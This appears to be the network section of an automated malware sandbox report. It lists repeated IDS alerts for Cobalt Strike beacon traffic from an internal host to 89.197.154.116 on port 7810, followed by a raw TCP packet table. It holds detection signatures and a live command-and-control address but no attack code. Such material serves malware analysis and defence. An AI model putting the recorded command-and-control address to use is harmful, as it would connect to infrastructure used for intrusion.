2024-10-07T22:01:52.812386+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50063	89.197.154.116	7810	TCP
2024-10-07T22:01:54.523649+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50064	89.197.154.116	7810	TCP
2024-10-07T22:01:54.523649+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50064	89.197.154.116	7810	TCP
2024-10-07T22:01:56.234251+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50065	89.197.154.116	7810	TCP
2024-10-07T22:01:56.234251+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50065	89.197.154.116	7810	TCP
2024-10-07T22:01:57.943671+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50066	89.197.154.116	7810	TCP
2024-10-07T22:01:57.943671+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50066	89.197.154.116	7810	TCP
2024-10-07T22:01:59.659436+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50067	89.197.154.116	7810	TCP
2024-10-07T22:01:59.659436+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50067	89.197.154.116	7810	TCP
2024-10-07T22:02:00.965734+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50068	89.197.154.116	7810	TCP
2024-10-07T22:02:00.965734+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50068	89.197.154.116	7810	TCP
2024-10-07T22:02:02.745780+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50069	89.197.154.116	7810	TCP
2024-10-07T22:02:02.745780+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50069	89.197.154.116	7810	TCP
2024-10-07T22:02:04.531226+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50070	89.197.154.116	7810	TCP
2024-10-07T22:02:04.531226+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50070	89.197.154.116	7810	TCP
2024-10-07T22:02:06.279916+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50071	89.197.154.116	7810	TCP
2024-10-07T22:02:06.279916+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50071	89.197.154.116	7810	TCP
2024-10-07T22:02:07.987670+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50072	89.197.154.116	7810	TCP
2024-10-07T22:02:07.987670+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50072	89.197.154.116	7810	TCP
2024-10-07T22:02:09.688424+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50073	89.197.154.116	7810	TCP
2024-10-07T22:02:09.688424+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50073	89.197.154.116	7810	TCP
2024-10-07T22:02:11.375813+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50074	89.197.154.116	7810	TCP
2024-10-07T22:02:11.375813+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50074	89.197.154.116	7810	TCP
2024-10-07T22:02:13.110536+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50075	89.197.154.116	7810	TCP
2024-10-07T22:02:13.110536+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50075	89.197.154.116	7810	TCP
2024-10-07T22:02:14.797259+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50076	89.197.154.116	7810	TCP
2024-10-07T22:02:14.797259+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50076	89.197.154.116	7810	TCP
2024-10-07T22:02:18.921867+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50077	89.197.154.116	7810	TCP
2024-10-07T22:02:18.921867+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50077	89.197.154.116	7810	TCP
2024-10-07T22:02:20.671891+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50078	89.197.154.116	7810	TCP
2024-10-07T22:02:20.671891+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50078	89.197.154.116	7810	TCP
2024-10-07T22:02:22.359658+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50079	89.197.154.116	7810	TCP
2024-10-07T22:02:22.359658+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50079	89.197.154.116	7810	TCP
2024-10-07T22:02:24.047079+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50080	89.197.154.116	7810	TCP
2024-10-07T22:02:24.047079+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50080	89.197.154.116	7810	TCP
2024-10-07T22:02:25.775690+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50081	89.197.154.116	7810	TCP
2024-10-07T22:02:25.775690+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50081	89.197.154.116	7810	TCP
2024-10-07T22:02:27.509125+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50082	89.197.154.116	7810	TCP
2024-10-07T22:02:27.509125+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50082	89.197.154.116	7810	TCP
2024-10-07T22:02:29.296493+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50083	89.197.154.116	7810	TCP
2024-10-07T22:02:29.296493+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50083	89.197.154.116	7810	TCP
2024-10-07T22:02:30.987183+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50084	89.197.154.116	7810	TCP
2024-10-07T22:02:30.987183+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50084	89.197.154.116	7810	TCP
2024-10-07T22:02:32.843335+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50085	89.197.154.116	7810	TCP
2024-10-07T22:02:32.843335+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50085	89.197.154.116	7810	TCP
2024-10-07T22:02:34.579818+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50086	89.197.154.116	7810	TCP
2024-10-07T22:02:34.579818+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50086	89.197.154.116	7810	TCP
2024-10-07T22:02:36.284525+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50087	89.197.154.116	7810	TCP
2024-10-07T22:02:36.284525+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50087	89.197.154.116	7810	TCP
2024-10-07T22:02:37.991762+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50088	89.197.154.116	7810	TCP
2024-10-07T22:02:37.991762+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50088	89.197.154.116	7810	TCP
2024-10-07T22:02:39.922933+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50089	89.197.154.116	7810	TCP
2024-10-07T22:02:39.922933+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50089	89.197.154.116	7810	TCP
2024-10-07T22:02:41.609244+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50090	89.197.154.116	7810	TCP
2024-10-07T22:02:41.609244+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50090	89.197.154.116	7810	TCP
2024-10-07T22:02:43.394927+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50091	89.197.154.116	7810	TCP
2024-10-07T22:02:43.394927+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50091	89.197.154.116	7810	TCP
2024-10-07T22:02:45.110616+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50092	89.197.154.116	7810	TCP
2024-10-07T22:02:45.110616+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50092	89.197.154.116	7810	TCP
2024-10-07T22:02:46.838712+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50093	89.197.154.116	7810	TCP
2024-10-07T22:02:46.838712+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50093	89.197.154.116	7810	TCP
2024-10-07T22:02:48.670293+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50094	89.197.154.116	7810	TCP
2024-10-07T22:02:48.670293+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50094	89.197.154.116	7810	TCP
2024-10-07T22:02:50.382420+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50095	89.197.154.116	7810	TCP
2024-10-07T22:02:50.382420+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50095	89.197.154.116	7810	TCP
2024-10-07T22:02:52.127731+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50096	89.197.154.116	7810	TCP
2024-10-07T22:02:52.127731+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50096	89.197.154.116	7810	TCP
2024-10-07T22:02:53.847880+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50097	89.197.154.116	7810	TCP
2024-10-07T22:02:53.847880+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50097	89.197.154.116	7810	TCP
2024-10-07T22:02:55.531342+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50098	89.197.154.116	7810	TCP
2024-10-07T22:02:55.531342+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50098	89.197.154.116	7810	TCP
2024-10-07T22:02:57.239729+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50099	89.197.154.116	7810	TCP
2024-10-07T22:02:57.239729+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50099	89.197.154.116	7810	TCP
2024-10-07T22:02:59.271603+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50100	89.197.154.116	7810	TCP
2024-10-07T22:02:59.271603+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50100	89.197.154.116	7810	TCP
2024-10-07T22:03:01.004317+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50101	89.197.154.116	7810	TCP
2024-10-07T22:03:01.004317+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50101	89.197.154.116	7810	TCP
2024-10-07T22:03:03.244781+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50102	89.197.154.116	7810	TCP
2024-10-07T22:03:03.244781+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50102	89.197.154.116	7810	TCP
2024-10-07T22:03:04.960032+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50103	89.197.154.116	7810	TCP
2024-10-07T22:03:04.960032+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50103	89.197.154.116	7810	TCP
2024-10-07T22:03:06.689840+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50104	89.197.154.116	7810	TCP
2024-10-07T22:03:06.689840+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50104	89.197.154.116	7810	TCP
2024-10-07T22:03:08.399776+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50105	89.197.154.116	7810	TCP
2024-10-07T22:03:08.399776+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50105	89.197.154.116	7810	TCP
2024-10-07T22:03:11.048493+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50106	89.197.154.116	7810	TCP
2024-10-07T22:03:11.048493+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50106	89.197.154.116	7810	TCP
2024-10-07T22:03:12.779771+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50107	89.197.154.116	7810	TCP
2024-10-07T22:03:12.779771+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50107	89.197.154.116	7810	TCP
2024-10-07T22:03:14.471824+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50108	89.197.154.116	7810	TCP
2024-10-07T22:03:14.471824+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50108	89.197.154.116	7810	TCP
2024-10-07T22:03:16.195755+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50109	89.197.154.116	7810	TCP
2024-10-07T22:03:16.195755+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50109	89.197.154.116	7810	TCP
2024-10-07T22:03:20.324957+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50110	89.197.154.116	7810	TCP
2024-10-07T22:03:20.324957+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50110	89.197.154.116	7810	TCP
2024-10-07T22:03:22.036589+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50111	89.197.154.116	7810	TCP
2024-10-07T22:03:22.036589+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50111	89.197.154.116	7810	TCP
2024-10-07T22:03:23.736122+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50112	89.197.154.116	7810	TCP
2024-10-07T22:03:23.736122+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50112	89.197.154.116	7810	TCP
2024-10-07T22:03:25.438851+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50113	89.197.154.116	7810	TCP
2024-10-07T22:03:25.438851+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50113	89.197.154.116	7810	TCP
2024-10-07T22:03:27.125403+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50114	89.197.154.116	7810	TCP
2024-10-07T22:03:27.125403+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50114	89.197.154.116	7810	TCP
2024-10-07T22:03:31.246894+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50115	89.197.154.116	7810	TCP
2024-10-07T22:03:31.246894+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50115	89.197.154.116	7810	TCP
2024-10-07T22:03:32.940347+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50116	89.197.154.116	7810	TCP
2024-10-07T22:03:32.940347+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50116	89.197.154.116	7810	TCP
2024-10-07T22:03:34.924692+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50117	89.197.154.116	7810	TCP
2024-10-07T22:03:34.924692+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50117	89.197.154.116	7810	TCP
2024-10-07T22:03:36.647798+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50118	89.197.154.116	7810	TCP
2024-10-07T22:03:36.647798+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50118	89.197.154.116	7810	TCP
2024-10-07T22:03:38.367772+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50119	89.197.154.116	7810	TCP
2024-10-07T22:03:38.367772+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50119	89.197.154.116	7810	TCP
2024-10-07T22:03:40.067334+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50120	89.197.154.116	7810	TCP
2024-10-07T22:03:40.067334+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50120	89.197.154.116	7810	TCP
2024-10-07T22:03:41.793351+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50121	89.197.154.116	7810	TCP
2024-10-07T22:03:41.793351+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50121	89.197.154.116	7810	TCP
2024-10-07T22:03:43.493833+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50122	89.197.154.116	7810	TCP
2024-10-07T22:03:43.493833+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50122	89.197.154.116	7810	TCP
2024-10-07T22:03:45.472141+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50123	89.197.154.116	7810	TCP
2024-10-07T22:03:45.472141+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50123	89.197.154.116	7810	TCP
2024-10-07T22:03:47.489094+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50124	89.197.154.116	7810	TCP
2024-10-07T22:03:47.489094+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50124	89.197.154.116	7810	TCP
2024-10-07T22:03:49.298704+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50125	89.197.154.116	7810	TCP
2024-10-07T22:03:49.298704+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50125	89.197.154.116	7810	TCP
2024-10-07T22:03:51.006116+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50126	89.197.154.116	7810	TCP
2024-10-07T22:03:51.006116+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50126	89.197.154.116	7810	TCP
2024-10-07T22:03:52.816640+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50127	89.197.154.116	7810	TCP
2024-10-07T22:03:52.816640+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50127	89.197.154.116	7810	TCP
2024-10-07T22:03:54.507410+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50128	89.197.154.116	7810	TCP
2024-10-07T22:03:54.507410+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50128	89.197.154.116	7810	TCP
2024-10-07T22:03:56.419858+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50129	89.197.154.116	7810	TCP
2024-10-07T22:03:56.419858+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50129	89.197.154.116	7810	TCP
2024-10-07T22:03:58.135993+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50130	89.197.154.116	7810	TCP
2024-10-07T22:03:58.135993+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50130	89.197.154.116	7810	TCP
2024-10-07T22:03:59.879302+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50131	89.197.154.116	7810	TCP
2024-10-07T22:03:59.879302+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50131	89.197.154.116	7810	TCP
2024-10-07T22:04:01.843457+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50132	89.197.154.116	7810	TCP
2024-10-07T22:04:01.843457+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50132	89.197.154.116	7810	TCP
2024-10-07T22:04:03.584335+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50133	89.197.154.116	7810	TCP
2024-10-07T22:04:03.584335+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50133	89.197.154.116	7810	TCP
2024-10-07T22:04:07.715970+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50134	89.197.154.116	7810	TCP
2024-10-07T22:04:07.715970+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50134	89.197.154.116	7810	TCP
2024-10-07T22:04:10.473796+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50135	89.197.154.116	7810	TCP
2024-10-07T22:04:10.473796+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50135	89.197.154.116	7810	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 22:00:03.300678015 CEST	49730	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:03.306559086 CEST	7810	49730	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:03.306699991 CEST	49730	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:03.306828022 CEST	49730	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:03.312769890 CEST	7810	49730	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:04.887253046 CEST	7810	49730	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:04.887326956 CEST	49730	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:04.887967110 CEST	49730	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:04.893280983 CEST	7810	49730	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:05.014847040 CEST	49731	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:05.235950947 CEST	7810	49731	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:05.236102104 CEST	49731	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:05.236342907 CEST	49731	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:05.241507053 CEST	7810	49731	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:06.825822115 CEST	7810	49731	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:06.825937033 CEST	49731	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:06.826057911 CEST	49731	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:06.830960989 CEST	7810	49731	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:06.934576988 CEST	49732	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:06.939713001 CEST	7810	49732	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:06.940051079 CEST	49732	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:06.940051079 CEST	49732	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:06.945334911 CEST	7810	49732	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:08.534648895 CEST	7810	49732	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:08.534714937 CEST	49732	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:08.534823895 CEST	49732	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:08.539798975 CEST	7810	49732	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:08.640726089 CEST	49733	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:08.646053076 CEST	7810	49733	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:08.646142960 CEST	49733	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:08.646265030 CEST	49733	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:08.651084900 CEST	7810	49733	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:10.264281034 CEST	7810	49733	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:10.264513016 CEST	49733	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:10.288728952 CEST	49733	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:10.293837070 CEST	7810	49733	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:10.447233915 CEST	49734	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:10.452310085 CEST	7810	49734	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:10.452389956 CEST	49734	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:10.452492952 CEST	49734	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:10.457340956 CEST	7810	49734	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:12.028065920 CEST	7810	49734	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:12.028170109 CEST	49734	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:12.028234005 CEST	49734	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:12.033113003 CEST	7810	49734	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:12.138391972 CEST	49735	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:12.143491030 CEST	7810	49735	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:12.143825054 CEST	49735	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:12.143825054 CEST	49735	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:12.148801088 CEST	7810	49735	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:13.851550102 CEST	7810	49735	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:13.851716042 CEST	49735	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:13.851716995 CEST	49735	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:13.856681108 CEST	7810	49735	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:13.967106104 CEST	49736	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:13.972138882 CEST	7810	49736	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:13.972251892 CEST	49736	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:13.972333908 CEST	49736	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:13.977190971 CEST	7810	49736	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:15.567559004 CEST	7810	49736	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:15.567673922 CEST	49736	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:15.567794085 CEST	49736	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:15.572954893 CEST	7810	49736	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:15.695374966 CEST	49737	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:15.700747967 CEST	7810	49737	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:15.700854063 CEST	49737	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:15.702023983 CEST	49737	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:15.706860065 CEST	7810	49737	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:17.302928925 CEST	7810	49737	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:17.303030968 CEST	49737	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:17.303105116 CEST	49737	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:17.309753895 CEST	7810	49737	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:17.418941975 CEST	49738	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:17.426016092 CEST	7810	49738	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:17.426090002 CEST	49738	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:17.426239967 CEST	49738	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:17.432204962 CEST	7810	49738	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:19.019432068 CEST	7810	49738	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:19.019521952 CEST	49738	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:19.019643068 CEST	49738	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:19.024517059 CEST	7810	49738	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:19.140320063 CEST	49741	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:19.145452976 CEST	7810	49741	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:19.145561934 CEST	49741	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:19.145735979 CEST	49741	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:19.150537968 CEST	7810	49741	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:20.715850115 CEST	7810	49741	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:20.715915918 CEST	49741	7810	192.168.2.4	89.197.154.116
